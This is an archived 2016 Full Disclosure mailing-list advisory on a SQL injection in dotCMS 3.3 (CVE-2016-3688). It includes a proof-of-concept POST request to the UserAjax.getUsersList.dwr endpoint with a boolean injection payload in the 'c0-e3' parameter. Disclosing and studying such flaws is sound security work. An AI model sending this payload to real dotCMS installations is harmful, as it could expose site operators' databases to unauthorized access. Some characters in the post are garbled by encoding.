[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] DotCMS injection Vulnerability
From: "=?gb18030?B?cDB4MjAxNQ==?=" <573031544 () qq ! com>
Date: 2016-03-31 13:13:15
Message-ID: tencent_5C7FBBAC00F6CF254FA01FBD () qq ! com
[Download RAW message or body]
[Attachment #2 (multipart/related)]
[Attachment #4 (text/plain)]
Hello,please Add the following to the security mailing-lists.
1¡¢Description
Exploit Title: SQL Injection Vulnerability in DotCms v3.3
Date: 3-28-2016
Vendor Homepage: http://dotcms.com/
Vendor: dotcms
Software: Content Management System
Version: v3.3
CVE:CVE-2016-3688
2¡¢Product Summary
================
dotcms is a fully featured open source enterprise grade J2EE/Java based web content management \
system for building/managing websites, content and content driven web applications. it¡¯s \
specially designed for bridges the gap between PHP CMS and J2EE document management solutions. \
it include features such as support for virtual hosting, WebDav (beta), structured content, \
clustering and can run on multiple databases PostgreSQL, MySQL, MSSQL and Oracle. It also \
includes standard WCMS features like page caching, templating, and a API.
3¡¢Vulnerabilities
================
A SQL injection vulnerability has been identified in dotCMS 3.3 which, if successfully \
exploited, could allow an attacker to access sensitive information in the dotcms database.
Demo:(http://dotcms.com/content-management-system/cms-demo)
The vulnerability is due to the dwr/call/plaincall/UserAjax.getUsersList.dwr \
,¡°c0-e3¡±parameter
Proof of concept
================
POST /dwr/call/plaincall/UserAjax.getUsersList.dwr
callCount=1
windowName=c0-param2
c0-scriptName=UserAjax
c0-methodName=getUsersList
c0-id=0
c0-param0=null:null
c0-param1=null:null
c0-e1=number:0
c0-e2=number:50
c0-e3=string:%25'%20and%201%3D1%20and%20'%25'%3D'
c0-param2=Object_Object:{start:reference:c0-e1, limit:reference:c0-e2, query:reference:c0-e3}
batchId=4
instanceId=0
page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1459154302419
scriptSessionId=jnMOli*Civ5bu2PIg2Z1YaOlYel/10irYel-hmv1Q$Yud
4¡¢Discovered by
================
piaox xiong ¨C xiongyaofu351@pingan.com.cn
["3001F400@35235C51.6B22FD56" (application/octet-stream)]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic